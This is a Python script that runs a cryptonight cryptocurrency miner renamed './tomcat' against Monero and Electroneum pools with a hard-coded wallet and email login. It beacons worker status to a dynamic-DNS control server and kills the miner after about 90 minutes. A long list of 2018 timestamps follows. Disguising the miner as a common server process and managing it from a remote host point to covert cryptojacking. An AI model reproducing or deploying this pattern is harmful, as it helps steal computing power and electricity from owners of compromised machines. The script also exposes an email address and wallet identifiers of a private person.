import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:50:08.807556
#2018-02-17 16:38:05.898859
#2018-02-17 18:26:06.344833
#2018-02-17 20:14:05.887323
#2018-02-17 22:02:04.026355
#2018-02-17 23:46:07.275173
#2018-02-18 01:34:06.380777
#2018-02-18 03:21:05.144021
#2018-02-18 05:09:01.825548
#2018-02-18 07:01:04.234795
#2018-02-18 08:48:04.758532
#2018-02-18 10:35:01.307881
#2018-02-18 12:20:01.469400
#2018-02-18 14:06:07.786303
#2018-02-18 15:56:01.420487
#2018-02-18 17:45:08.162839
#2018-02-18 19:32:07.829712
#2018-02-18 21:17:05.764986
#2018-02-18 23:05:04.735438
#2018-02-19 00:52:04.493593
#2018-02-19 02:39:04.920395
#2018-02-19 04:26:07.670900
#2018-02-19 06:11:06.217380
#2018-02-19 07:58:01.560427
#2018-02-19 09:49:07.617077
#2018-02-19 11:37:08.820265
#2018-02-19 13:24:07.039053
#2018-02-19 15:13:08.453580
#2018-02-19 17:01:04.045344
#2018-02-19 18:47:06.624795
#2018-02-19 20:36:05.905269
#2018-02-19 22:22:03.945616
#2018-02-20 00:08:01.618271
#2018-02-20 01:54:05.423811
#2018-02-20 03:42:05.568599
#2018-02-20 05:28:06.566517
#2018-02-20 07:12:08.333440
#2018-02-20 08:57:08.734070
#2018-02-20 10:41:07.622854
#2018-02-20 12:27:01.398741
#2018-02-20 14:14:01.635944
#2018-02-20 15:56:13.142487
#2018-02-20 17:43:13.858597
#2018-02-20 19:33:01.756772
#2018-02-20 21:20:09.708645
#2018-02-20 23:06:05.008143
#2018-02-21 00:51:07.711029
#2018-02-21 02:37:07.190027
#2018-02-21 04:26:02.205997
#2018-02-21 06:14:09.407011
#2018-02-21 08:00:07.423971
#2018-02-21 09:47:06.432185
#2018-02-21 11:36:01.452309
#2018-02-21 13:26:06.336719
#2018-02-21 15:11:05.646429
#2018-02-21 17:02:01.491272
#2018-02-21 18:49:08.665120
#2018-02-21 20:34:06.512669
#2018-02-21 22:19:06.358018
#2018-02-22 00:08:05.604750
#2018-02-22 01:57:08.182283
#2018-02-22 03:44:04.662584
#2018-02-22 05:31:01.347898
#2018-02-22 07:16:01.798736
#2018-02-22 09:03:06.397812
#2018-02-22 10:50:05.138786
#2018-02-22 12:36:05.719287
#2018-02-22 14:22:07.906231
#2018-02-22 16:10:01.505148
#2018-02-22 17:54:11.617991
#2018-02-22 19:44:04.213159
#2018-02-22 21:35:07.900044
#2018-02-22 23:24:07.991856
#2018-02-23 01:10:11.161949
#2018-02-23 02:56:01.498979
#2018-02-23 04:44:01.923933
#2018-02-23 06:32:03.487495
#2018-02-23 08:19:05.620675
#2018-02-23 10:36:04.296409
#2018-02-23 12:31:06.311565
#2018-02-23 14:18:06.496978
#2018-02-23 16:09:01.737208
#2018-02-23 17:54:04.300346
#2018-02-23 19:40:04.905538
#2018-02-23 21:22:07.738577
#2018-02-23 23:10:07.529026
#2018-02-24 01:01:05.332237
#2018-02-24 02:55:04.043194
#2018-02-24 04:45:08.009741
#2018-02-24 06:32:03.869808
#2018-02-24 08:20:06.108992
#2018-02-24 10:04:07.327831
#2018-02-24 12:03:07.334778
#2018-02-24 13:51:07.407287
#2018-02-24 15:31:01.653602
#2018-02-24 17:26:05.126193
#2018-02-24 19:13:05.090071
#2018-02-24 21:00:10.260745
#2018-02-24 23:32:04.908499
#2018-02-25 02:55:04.091004
#2018-02-25 07:01:07.272669